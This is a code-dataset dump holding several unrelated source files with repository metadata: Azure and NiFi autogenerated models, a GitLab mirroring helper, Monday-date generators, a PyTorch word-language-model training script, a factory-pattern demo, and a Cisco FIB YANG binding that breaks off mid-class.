] | 2 | 2017-01-20T18:25:46.000Z | 2017-05-12T21:31:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class NetworkWatcher(Resource):
"""Network watcher in a resource group.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource ID.
:type id: str
:ivar name: Resource name.
:vartype name: str
:ivar type: Resource type.
:vartype type: str
:param location: Resource location.
:type location: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:ivar provisioning_state: The provisioning state of the resource. Possible
values include: 'Succeeded', 'Updating', 'Deleting', 'Failed'
:vartype provisioning_state: str or
~azure.mgmt.network.v2017_09_01.models.ProvisioningState
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'etag': {'key': 'etag', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(self, **kwargs):
super(NetworkWatcher, self).__init__(**kwargs)
self.etag = kwargs.get('etag', None)
self.provisioning_state = None
| 34.433333 | 85 | 0.584221 |
c3f90e5d6e96d4856f238bf286404cb56c0f391e | 4,635 | py | Python | vcs_mirrors/host/gitlab.py | jayvdb/vcs-mirrors | db10e912224b7482ba5d8318b0d78f257d0e152d | [
"MIT"
] | 4 | 2018-04-27T23:12:49.000Z | 2020-11-02T02:03:52.000Z | vcs_mirrors/host/gitlab.py | jayvdb/vcs-mirrors | db10e912224b7482ba5d8318b0d78f257d0e152d | [
"MIT"
] | 1 | 2020-01-14T08:18:44.000Z | 2020-01-14T08:18:44.000Z | vcs_mirrors/host/gitlab.py | jayvdb/vcs-mirrors | db10e912224b7482ba5d8318b0d78f257d0e152d | [
"MIT"
] | 1 | 2020-01-14T05:22:47.000Z | 2020-01-14T05:22:47.000Z | """
Large parts from: https://github.com/samrocketman/gitlab-mirrors/blob/development/lib/manage_gitlab_project.py
"""
import logging
from zope.interface import implementer
from vcs_mirrors.lib.interfaces import IHost
try:
import gitlab
from gitlab.exceptions import GitlabCreateError
GITLAB_AVAILABLE = True
except ImportError:
GITLAB_AVAILABLE = False
pass
__all__ = ['__virtual__', 'Host']
def __virtual__():
if not GITLAB_AVAILABLE:
logging.warn(
'Host type "gitlab" isn\'t available, couldn\'t import python-gitlab')
return GITLAB_AVAILABLE
def _find_matches(objects, kwargs, find_all):
"""Helper function for _add_find_fn. Find objects whose properties
match all key, value pairs in kwargs.
Source: https://github.com/doctormo/python-gitlab3/blob/master/gitlab3/__init__.py
"""
ret = []
for obj in objects:
match = True
# Match all supplied parameters
for param, val in kwargs.items():
if not getattr(obj, param) == val:
match = False
break
if match:
if find_all:
ret.append(obj)
else:
return obj
if not find_all:
return None
return ret
@implementer(IHost)
class Host(object):
TYPE = 'gitlab'
_settings = None
def __init__(self, host, settings):
self._settings = {
'url': host,
'ssl_verify': True,
'public': False,
'issues_enabled': False,
'wall_enabled': False,
'merge_requests_enabled': False,
'wiki_enabled': False,
'snippets_enabled': False,
'use_https': False,
}
self._settings.update(settings)
# pylint: disable=E1101
self._api = gitlab.Gitlab(
'https://' + self._settings['url'],
self._settings['api_key'],
ssl_verify=self._settings['ssl_verify'],
api_version=4
)
# pylint: enable=E1101
self._api.auth()
def _find_group(self, **kwargs):
groups = self._api.groups.list()
return _find_matches(groups, kwargs, False)
def _find_user(self, **kwargs):
users = self._api.users.list()
return _find_matches(users, kwargs, False)
def _find_project(self, **kwargs):
projects = self._api.projects.list(as_list=True)
return _find_matches(projects, kwargs, False)
def create_project(self, source, repo):
desc = 'Git mirror of %s.' % source
if self._settings['public']:
desc = 'Public mirror of %s' % source
group, name = repo.split('/')
group_obj = self._find_group(name=group)
if group_obj is None:
group_obj = self._find_user(username=group)
if group_obj is None:
logging.info('%s: Createing group: "%s"' % (self, group))
try:
group_obj = self._api.groups.create({'name': group, 'path': group})
except GitlabCreateError:
logging.error('Cannot create group "%s", error: path has already been taken.' % group)
return False
project_options = {
'name': name,
'description': desc,
'issues_enabled': str(self._settings['issues_enabled']).lower(),
'wall_enabled': str(self._settings['wall_enabled']).lower(),
'merge_requests_enabled': str(self._settings['merge_requests_enabled']).lower(),
'wiki_enabled': str(self._settings['wiki_enabled']).lower(),
'snippets_enabled': str(self._settings['snippets_enabled']).lower(),
'namespace_id': group_obj.id
}
logging.info('%s: Createing project: "%s"' % (self, repo))
try:
project = self._api.projects.create(project_options)
except GitlabCreateError:
logging.error('Cannot create project "%s", error: path has already been taken.' % repo)
return False
if self._settings['use_https']:
return project.http_url_to_repo
return project.ssh_url_to_repo
def get_url(self, repo):
project = self._find_project(name=repo)
if project is None:
return None
if self._settings['use_https']:
return project.http_url_to_repo
return project.ssh_url_to_repo
def __repr__(self):
return '<%s(%s)>' % (self.TYPE, self._settings['url'])
def __str__(self):
return '%s:%s' % (self.TYPE, self._settings['url'])
| 30.097403 | 110 | 0.59137 |
870c0c7558830f685b6f820b0605913e3a9db722 | 3,892 | py | Python | cs/python/python_general/misc_functions/dates.py | tobias-fyi/vela | b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82 | [
"MIT"
] | null | null | null | cs/python/python_general/misc_functions/dates.py | tobias-fyi/vela | b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82 | [
"MIT"
] | 8 | 2020-03-24T17:47:23.000Z | 2022-03-12T00:33:21.000Z | cs/python/python_general/misc_functions/dates.py | tobias-fyi/vela | b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82 | [
"MIT"
] | null | null | null | """Fun(c) with dates"""
# %% Imports
from datetime import datetime, timedelta
from typing import List
# %% Mondays
def mondays_between_two_dates(start: datetime, end: datetime) -> List[str]:
"""Returns the dates of each Monday between two dates, inclusive.
:param start (str) : ISO-formatted start date.
:param end (str) : ISO-formatted end date.
:return (List[str]) : List of dates of Mondays falling b/w the two.
"""
mon_dates = []
# Somewhat-convoluted way to find the first Monday
# * by 0 (Monday) means no change
start += timedelta(((7 * start.weekday()) + (7 - start.weekday())) % 7)
# # Interesting idea to get nearest Monday, but doesn't work
# start += timedelta(days=-start.weekday(), weeks=1)
while start <= end: # Add timedelta of 7 until on or after end date
mon_dates.append(start.strftime("%Y-%m-%d"))
start += timedelta(7)
return mon_dates # Return list of dates
print("Start on a monday; end on a Wednesday:")
print(mondays_between_two_dates(datetime(2018, 1, 1), datetime(2018, 1, 31)))
print("\nStart on a Wednesday; end on a Monday:")
print(mondays_between_two_dates(datetime(2018, 1, 3), datetime(2018, 1, 29)))
# %% Mondays
def monday_gen(start: datetime, end: datetime) -> List[str]:
"""Generator version of the above, just for fun."""
start += timedelta(((7 * start.weekday()) + (7 - start.weekday())) % 7)
def mon_gen(start, end):
while start <= end:
yield start.strftime("%Y-%m-%d")
start += timedelta(7)
return [date for date in mon_gen(start, end)]
print("Start on a monday; end on a Wednesday:")
print(monday_gen(datetime(2018, 1, 1), datetime(2018, 1, 31)))
print("\nStart on a Wednesday; end on a Monday:")
print(monday_gen(datetime(2018, 1, 3), datetime(2018, 1, 29)))
# %% Separate / unnested generator func version
# Note: Not typed quite right - it "returns" a generator
def monday_generator(start: datetime, end: datetime, sep: str = "-") -> str:
"""Generator function for Mondays between two dates, inclusive."""
start += timedelta(((7 * start.weekday()) + (7 - start.weekday())) % 7)
while start <= end:
yield start.strftime(f"%Y{sep}%m{sep}%d")
start += timedelta(7)
print("Start on a monday; end on a Wednesday:")
print([m for m in monday_generator(datetime(2018, 1, 1), datetime(2018, 1, 31))])
print("\nStart on a Wednesday; end on a Monday:")
print([m for m in monday_generator(datetime(2018, 1, 3), datetime(2018, 1, 29), "/")])
# %% Parsing datetime strings
print(datetime.fromisoformat("2018-01-01"))
# %%
def monday_genr(start, end, sep: str = "-") -> str:
"""Generator function for Mondays between two dates, inclusive.
Accepts ISO-formatted strings or datetime objects.
"""
if type(start) == str:
start = datetime.fromisoformat(start)
if type(end) == str:
end = datetime.fromisoformat(end)
start += timedelta(((7 * start.weekday()) + (7 - start.weekday())) % 7)
while start <= end:
yield start.strftime(f"%Y{sep}%m{sep}%d")
start += timedelta(7)
print("Start on a monday; end on a Wednesday (string):")
print([m for m in monday_genr("2018-01-01", "2018-01-31")])
print("\nStart on a Wednesday; end on a Monday (datetime):")
print([m for m in monday_genr(datetime(2018, 1, 3), datetime(2018, 1, 29), "/")])
# %% Weekly date generator
def day_date_generator(start, end, sep: str = "-") -> str:
"""Generator function for weekly dates between two dates.
Accepts date strings or datetime objects.
"""
if type(start) == str:
start = datetime.fromisoformat(start.replace("/", "-"))
if type(end) == str:
end = datetime.fromisoformat(end.replace("/", "-"))
while start <= end:
yield start.strftime(f"%Y{sep}%m{sep}%d")
start += timedelta(7) # Weekly increments
| 35.706422 | 86 | 0.643114 |
b6b7069571f69f0b0de097e3f6fa403a831fc40c | 3,751 | py | Python | nipyapi/registry/models/resource.py | Jimvin/nipyapi | 826beac376d4321bd2d69491f09086474c7e7bfb | [
"Apache-2.0"
] | 199 | 2017-08-24T12:19:41.000Z | 2022-03-20T14:50:17.000Z | nipyapi/registry/models/resource.py | Jimvin/nipyapi | 826beac376d4321bd2d69491f09086474c7e7bfb | [
"Apache-2.0"
] | 275 | 2017-08-28T21:21:49.000Z | 2022-03-29T17:57:26.000Z | nipyapi/registry/models/resource.py | Jimvin/nipyapi | 826beac376d4321bd2d69491f09086474c7e7bfb | [
"Apache-2.0"
] | 73 | 2017-09-07T10:13:56.000Z | 2022-02-28T10:37:21.000Z | # coding: utf-8
"""
Apache NiFi Registry REST API
The REST API provides an interface to a registry with operations for saving, versioning, reading NiFi flows and components.
OpenAPI spec version: 1.15.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class Resource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'identifier': 'str',
'name': 'str'
}
attribute_map = {
'identifier': 'identifier',
'name': 'name'
}
def __init__(self, identifier=None, name=None):
"""
Resource - a model defined in Swagger
"""
self._identifier = None
self._name = None
if identifier is not None:
self.identifier = identifier
if name is not None:
self.name = name
@property
def identifier(self):
"""
Gets the identifier of this Resource.
The identifier of the resource.
:return: The identifier of this Resource.
:rtype: str
"""
return self._identifier
@identifier.setter
def identifier(self, identifier):
"""
Sets the identifier of this Resource.
The identifier of the resource.
:param identifier: The identifier of this Resource.
:type: str
"""
self._identifier = identifier
@property
def name(self):
"""
Gets the name of this Resource.
The name of the resource.
:return: The name of this Resource.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this Resource.
The name of the resource.
:param name: The name of this Resource.
:type: str
"""
self._name = name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, Resource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 24.357143 | 127 | 0.53799 |
3950b599fc72a2dc295e2e7ac1546a871dd9102a | 1,690 | py | Python | a10sdk/core/logging/logging_email_filter.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 16 | 2015-05-20T07:26:30.000Z | 2021-01-23T11:56:57.000Z | a10sdk/core/logging/logging_email_filter.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 6 | 2015-03-24T22:07:11.000Z | 2017-03-28T21:31:18.000Z | a10sdk/core/logging/logging_email_filter.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 23 | 2015-03-29T15:43:01.000Z | 2021-06-02T17:12:01.000Z | from a10sdk.common.A10BaseClass import A10BaseClass
class Filter(A10BaseClass):
"""Class Description::
Logging via email filter settings.
Class filter supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param filter_id: {"description": "Logging via email filter settings", "format": "number", "type": "number", "maximum": 8, "minimum": 1, "optional": false}
:param trigger: {"default": 0, "optional": true, "type": "number", "description": "Trigger email, override buffer settings", "format": "flag"}
:param expression: {"description": "Reverse Polish Notation, consists of level 0-7, module AFLEX/HMON/..., pattern log-content-pattern, and or/and/not", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 511, "type": "string"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/logging/email/filter/{filter_id}`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required = [ "filter_id"]
self.b_key = "filter"
self.a10_url="/axapi/v3/logging/email/filter/{filter_id}"
self.DeviceProxy = ""
self.filter_id = ""
self.trigger = ""
self.expression = ""
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
| 39.302326 | 250 | 0.642012 |
663399fc6a136ba9c5bbad123a56724e2c7c8044 | 10,722 | py | Python | examples/duet/word_language_model/original/main.py | godormad/PySyft | fcb3374b6318dcccf377175fb8db6f70e9e1d1e3 | [
"Apache-2.0"
] | 1 | 2020-12-22T17:22:13.000Z | 2020-12-22T17:22:13.000Z | examples/duet/word_language_model/original/main.py | godormad/PySyft | fcb3374b6318dcccf377175fb8db6f70e9e1d1e3 | [
"Apache-2.0"
] | null | null | null | examples/duet/word_language_model/original/main.py | godormad/PySyft | fcb3374b6318dcccf377175fb8db6f70e9e1d1e3 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# stdlib
import argparse
import math
import os
import time
# third party
import data
import model
import torch
import torch.nn as nn
import torch.onnx
parser = argparse.ArgumentParser(
description="PyTorch Wikitext-2 RNN/LSTM/GRU/Transformer Language Model"
)
parser.add_argument(
"--data",
type=str,
default="./data/wikitext-2",
help="location of the data corpus; default: \"./data/wikitext-2\""
)
parser.add_argument(
"--model",
type=str,
default="LSTM",
help="type of recurrent net (RNN_TANH, RNN_RELU, LSTM, GRU, Transformer); default: \"LSTM\"",
)
parser.add_argument(
"--emsize",
type=int,
default=200,
help="size of word embeddings; default: 200"
)
parser.add_argument(
"--nhid",
type=int,
default=200,
help="number of hidden units per layer; default: 200"
)
parser.add_argument(
"--nlayers",
type=int,
default=2,
help="number of layers; default: 2"
)
parser.add_argument(
"--lr",
type=float,
default=20,
help="initial learning rate; default: 20"
)
parser.add_argument(
"--clip",
type=float,
default=0.25,
help="gradient clipping; default: 0.25"
)
parser.add_argument(
"--epochs",
type=int,
default=40,
help="upper epoch limit; default: 40"
)
parser.add_argument(
"--batch_size",
type=int,
default=20,
metavar="N",
help="batch size; default: 20"
)
parser.add_argument(
"--bptt",
type=int,
default=35,
help="sequence length; default: 35"
)
parser.add_argument(
"--dropout",
type=float,
default=0.2,
help="dropout applied to layers (0 = no dropout); default: 0.2",
)
parser.add_argument(
"--tied",
action="store_true",
help="tie the word embedding and softmax weights"
)
parser.add_argument(
"--seed",
type=int,
default=1111,
help="random seed; default: 1111"
)
parser.add_argument(
"--cuda",
action="store_true",
help="use CUDA"
)
parser.add_argument(
"--log-interval",
type=int,
default=200,
metavar="N",
help="report interval; default: 200"
)
parser.add_argument(
"--save",
type=str,
default="model.pt",
help="path to save the final model; default: \"model.pt\""
)
parser.add_argument(
"--onnx-export",
type=str,
default="",
help="path to export the final model in onnx format; default: ''",
)
parser.add_argument(
"--nhead",
type=int,
default=2,
help="the number of heads in the encoder/decoder of the transformer model; default: 2",
)
parser.add_argument(
"--dry-run",
action="store_true",
help="verify the code and the model"
)
args = parser.parse_args()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
device = torch.device("cuda" if args.cuda else "cpu")
###############################################################################
# Load data
###############################################################################
corpus = data.Corpus(args.data)
# Starting from sequential data, batchify arranges the dataset into columns.
# For instance, with the alphabet as the sequence and batch size 4, we'd get
# ┌ a g m s ┐
# │ b h n t │
# │ c i o u │
# │ d j p v │
# │ e k q w │
# └ f l r x ┘.
# These columns are treated as independent by the model, which means that the
# dependence of e. g. 'g' on 'f' can not be learned, but allows more efficient
# batch processing.
def batchify(data, bsz):
# Work out how cleanly we can divide the dataset into bsz parts.
nbatch = data.size(0) // bsz
# Trim off any extra elements that wouldn't cleanly fit (remainders).
data = data.narrow(0, 0, nbatch * bsz)
# Evenly divide the data across the bsz batches.
data = data.view(bsz, -1).t().contiguous()
return data.to(device)
eval_batch_size = 10
train_data = batchify(corpus.train, args.batch_size)
val_data = batchify(corpus.valid, eval_batch_size)
test_data = batchify(corpus.test, eval_batch_size)
###############################################################################
# Build the model
###############################################################################
ntokens = len(corpus.dictionary)
if args.model == "Transformer":
model = model.TransformerModel(
ntokens, args.emsize, args.nhead, args.nhid, args.nlayers, args.dropout
).to(device)
else:
model = model.RNNModel(
args.model,
ntokens,
args.emsize,
args.nhid,
args.nlayers,
args.dropout,
args.tied,
).to(device)
criterion = nn.NLLLoss()
###############################################################################
# Training code
###############################################################################
def repackage_hidden(h):
"""Wraps hidden states in new Tensors, to detach them from their history."""
if isinstance(h, torch.Tensor):
return h.detach()
else:
return tuple(repackage_hidden(v) for v in h)
# get_batch subdivides the source data into chunks of length args.bptt.
# If source is equal to the example output of the batchify function, with
# a bptt-limit of 2, we'd get the following two Variables for i = 0:
# ┌ a g m s ┐ ┌ b h n t ┐
# └ b h n t ┘ └ c i o u ┘
# Note that despite the name of the function, the subdivison of data is not
# done along the batch dimension (i.e. dimension 1), since that was handled
# by the batchify function. The chunks are along dimension 0, corresponding
# to the seq_len dimension in the LSTM.
def get_batch(source, i):
seq_len = min(args.bptt, len(source) - 1 - i)
data = source[i : i + seq_len]
target = source[i + 1 : i + 1 + seq_len].view(-1)
return data, target
def evaluate(data_source):
# Turn on evaluation mode which disables dropout.
model.eval()
total_loss = 0.0
ntokens = len(corpus.dictionary)
if args.model != "Transformer":
hidden = model.init_hidden(eval_batch_size)
with torch.no_grad():
for i in range(0, data_source.size(0) - 1, args.bptt):
data, targets = get_batch(data_source, i)
if args.model == "Transformer":
output = model(data)
output = output.view(-1, ntokens)
else:
output, hidden = model(data, hidden)
hidden = repackage_hidden(hidden)
total_loss += len(data) * criterion(output, targets).item()
return total_loss / (len(data_source) - 1)
def train():
# Turn on training mode which enables dropout.
model.train()
total_loss = 0.0
start_time = time.time()
ntokens = len(corpus.dictionary)
if args.model != "Transformer":
hidden = model.init_hidden(args.batch_size)
for batch, i in enumerate(range(0, train_data.size(0) - 1, args.bptt)):
data, targets = get_batch(train_data, i)
# Starting each batch, we detach the hidden state from how it was previously produced.
# If we didn't, the model would try backpropagating all the way to start of the dataset.
model.zero_grad()
if args.model == "Transformer":
output = model(data)
output = output.view(-1, ntokens)
else:
hidden = repackage_hidden(hidden)
output, hidden = model(data, hidden)
loss = criterion(output, targets)
loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
for p in model.parameters():
p.data.add_(p.grad, alpha=-lr)
total_loss += loss.item()
if batch % args.log_interval == 0 and batch > 0:
cur_loss = total_loss / args.log_interval
elapsed = time.time() - start_time
print(
"| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | ms/batch {:5.2f} | "
"loss {:5.2f} | ppl {:8.2f}".format(
epoch,
batch,
len(train_data) // args.bptt,
lr,
elapsed * 1000 / args.log_interval,
cur_loss,
math.exp(cur_loss),
)
)
total_loss = 0
start_time = time.time()
if args.dry_run:
break
def export_onnx(path, batch_size, seq_len):
print(
"The model is also exported in ONNX format at {}".format(
os.path.realpath(args.onnx_export)
)
)
model.eval()
dummy_input = (
torch.LongTensor(seq_len * batch_size).zero_().view(-1, batch_size).to(device)
)
hidden = model.init_hidden(batch_size)
torch.onnx.export(model, (dummy_input, hidden), path)
# Loop over epochs.
lr = args.lr
best_val_loss = None
# At any point you can hit Ctrl + C to break out of training early.
try:
for epoch in range(1, args.epochs + 1):
epoch_start_time = time.time()
train()
val_loss = evaluate(val_data)
print("-" * 89)
print(
"| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | "
"valid ppl {:8.2f}".format(
epoch, (time.time() - epoch_start_time), val_loss, math.exp(val_loss)
)
)
print("-" * 89)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
with open(args.save, "wb") as f:
torch.save(model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
lr /= 4.0
except KeyboardInterrupt:
print("-" * 89)
print("Exiting from training early")
# Load the best saved model.
with open(args.save, "rb") as f:
model = torch.load(f)
# after load the rnn params are not a continuous chunk of memory
# this makes them a continuous chunk, and will speed up forward pass
# Currently, only rnn model supports flatten_parameters function.
if args.model in ["RNN_TANH", "RNN_RELU", "LSTM", "GRU"]:
model.rnn.flatten_parameters()
# Run on test data.
test_loss = evaluate(test_data)
print("=" * 89)
print(
"| End of training | test loss {:5.2f} | test ppl {:8.2f}".format(
test_loss, math.exp(test_loss)
)
)
print("=" * 89)
if len(args.onnx_export) > 0:
# Export the model in ONNX format.
export_onnx(args.onnx_export, batch_size=1, seq_len=args.bptt)
| 29.056911 | 97 | 0.592613 |
831e487ac073eea4a8131b23e5b526eaa67e5298 | 771 | py | Python | creational-patterns/factory.py | someshchaturvedi/pythonic-design-patterns | 74ef0b1ad233bdf9f75f86afa1b8874228d88429 | [
"MIT"
] | 1 | 2018-08-02T12:16:20.000Z | 2018-08-02T12:16:20.000Z | creational-patterns/factory.py | someshchaturvedi/pythonic-design-patterns | 74ef0b1ad233bdf9f75f86afa1b8874228d88429 | [
"MIT"
] | null | null | null | creational-patterns/factory.py | someshchaturvedi/pythonic-design-patterns | 74ef0b1ad233bdf9f75f86afa1b8874228d88429 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
class Phone(ABC):
@abstractmethod
def name(self):
pass
class ApplePhone(Phone):
def name(self):
print('apple phone')
class SamsungPhone(Phone):
def name(self):
print('samsung phone')
class Company(ABC):
def get_phone(self):
return self.phone_factory()
@abstractmethod
def phone_factory(self):
pass
class AppleCompany(Company):
def phone_factory(self):
return ApplePhone()
class SamsungCompany(Company):
def phone_factory(self):
return SamsungPhone()
if __name__ == '__main__':
apple_company = AppleCompany()
apple_company.get_phone().name()
samsung_company = SamsungCompany()
samsung_company.get_phone().name()
| 17.133333 | 38 | 0.661479 |
79aafe4ef32c5d30a33784ad089b6d6a12ae3822 | 15,791 | py | Python | cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_fib_oper.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_fib_oper.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_fib_oper.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-07-22T04:04:44.000Z | 2020-07-22T04:04:44.000Z | """ Cisco_IOS_XE_fib_oper
This module contains a collection of YANG definitions
for IOS\-XE FIB operational data.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class EncapsulationHeaderType(Enum):
"""
EncapsulationHeaderType (Enum Class)
Types of header for packet encapsulation
.. data:: encap_hdr_type_unknown = 0
Unknown encapsulation header type
.. data:: encap_hdr_type_gre = 1
GRE encapsulation header type
.. data:: encap_hdr_type_ipv4 = 2
IPv4 encapsulation header type
.. data:: encap_hdr_type_ipv6 = 3
IPv6 encapsulation header type
.. data:: encap_hdr_type_mpls = 4
MPLS encapsulation header type
"""
encap_hdr_type_unknown = Enum.YLeaf(0, "encap-hdr-type-unknown")
encap_hdr_type_gre = Enum.YLeaf(1, "encap-hdr-type-gre")
encap_hdr_type_ipv4 = Enum.YLeaf(2, "encap-hdr-type-ipv4")
encap_hdr_type_ipv6 = Enum.YLeaf(3, "encap-hdr-type-ipv6")
encap_hdr_type_mpls = Enum.YLeaf(4, "encap-hdr-type-mpls")
class FibAddressFamily(Enum):
"""
FibAddressFamily (Enum Class)
FIB Address Family Types
.. data:: fib_addr_fam_unknown = 0
Unknown Address Family
.. data:: fib_addr_fam_ipv4 = 1
IPv4 Address Family
.. data:: fib_addr_fam_ipv6 = 2
IPv6 Address Family
"""
fib_addr_fam_unknown = Enum.YLeaf(0, "fib-addr-fam-unknown")
fib_addr_fam_ipv4 = Enum.YLeaf(1, "fib-addr-fam-ipv4")
fib_addr_fam_ipv6 = Enum.YLeaf(2, "fib-addr-fam-ipv6")
class FibPathType(Enum):
"""
FibPathType (Enum Class)
Type of FIB path used
.. data:: fib_path_type_unknown = 0
Unknown FIB path type
.. data:: fib_path_type_receive = 1
Receive FIB path type
.. data:: fib_path_type_connected = 2
Connected FIB path type
.. data:: fib_path_type_attached_prefix = 3
Attached Prefix FIB path type
.. data:: fib_path_type_attached_host = 4
Attached Host FIB path type
.. data:: fib_path_type_attached_nexthop = 5
Attached Nexthop FIB path type
.. data:: fib_path_type_recursive = 6
Recursive FIB path type
.. data:: fib_path_type_adjacency_prefix = 7
Adjacency Prefix FIB path type
.. data:: fib_path_type_special_prefix = 8
Special Prefix FIB path type
"""
fib_path_type_unknown = Enum.YLeaf(0, "fib-path-type-unknown")
fib_path_type_receive = Enum.YLeaf(1, "fib-path-type-receive")
fib_path_type_connected = Enum.YLeaf(2, "fib-path-type-connected")
fib_path_type_attached_prefix = Enum.YLeaf(3, "fib-path-type-attached-prefix")
fib_path_type_attached_host = Enum.YLeaf(4, "fib-path-type-attached-host")
fib_path_type_attached_nexthop = Enum.YLeaf(5, "fib-path-type-attached-nexthop")
fib_path_type_recursive = Enum.YLeaf(6, "fib-path-type-recursive")
fib_path_type_adjacency_prefix = Enum.YLeaf(7, "fib-path-type-adjacency-prefix")
fib_path_type_special_prefix = Enum.YLeaf(8, "fib-path-type-special-prefix")
class FibOperData(Entity):
"""
This module contains a collection of YANG definitions for
monitoring the operation of IOS\-XE CEF.
Copyright (c) 2016\-2017 by Cisco Systems, Inc.
All rights reserved.
.. attribute:: fib_ni_entry
FIB Network Instances
**type**\: list of :py:class:`FibNiEntry <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibOperData.FibNiEntry>`
"""
_prefix = 'fib-ios-xe-oper'
_revision = '2017-07-04'
def __init__(self):
super(FibOperData, self).__init__()
self._top_entity = None
self.yang_name = "fib-oper-data"
self.yang_parent_name = "Cisco-IOS-XE-fib-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("fib-ni-entry", ("fib_ni_entry", FibOperData.FibNiEntry))])
self._leafs = OrderedDict()
self.fib_ni_entry = YList(self)
self._segment_path = lambda: "Cisco-IOS-XE-fib-oper:fib-oper-data"
def __setattr__(self, name, value):
self._perform_setattr(FibOperData, [], name, value)
class FibNiEntry(Entity):
"""
FIB Network Instances
.. attribute:: instance_name (key)
Instance Name
**type**\: str
.. attribute:: af
Address Family
**type**\: :py:class:`FibAddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibAddressFamily>`
.. attribute:: num_pfx
Number of prefixes
**type**\: int
**range:** 0..4294967295
.. attribute:: num_pfx_fwd
Number of forwarding prefixes
**type**\: int
**range:** 0..4294967295
.. attribute:: num_pfx_non_fwd
Number of non\-forwarding prefixes
**type**\: int
**range:** 0..4294967295
.. attribute:: fib_entries
List of FIB entries
**type**\: list of :py:class:`FibEntries <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibOperData.FibNiEntry.FibEntries>`
"""
_prefix = 'fib-ios-xe-oper'
_revision = '2017-07-04'
def __init__(self):
super(FibOperData.FibNiEntry, self).__init__()
self.yang_name = "fib-ni-entry"
self.yang_parent_name = "fib-oper-data"
self.is_top_level_class = False
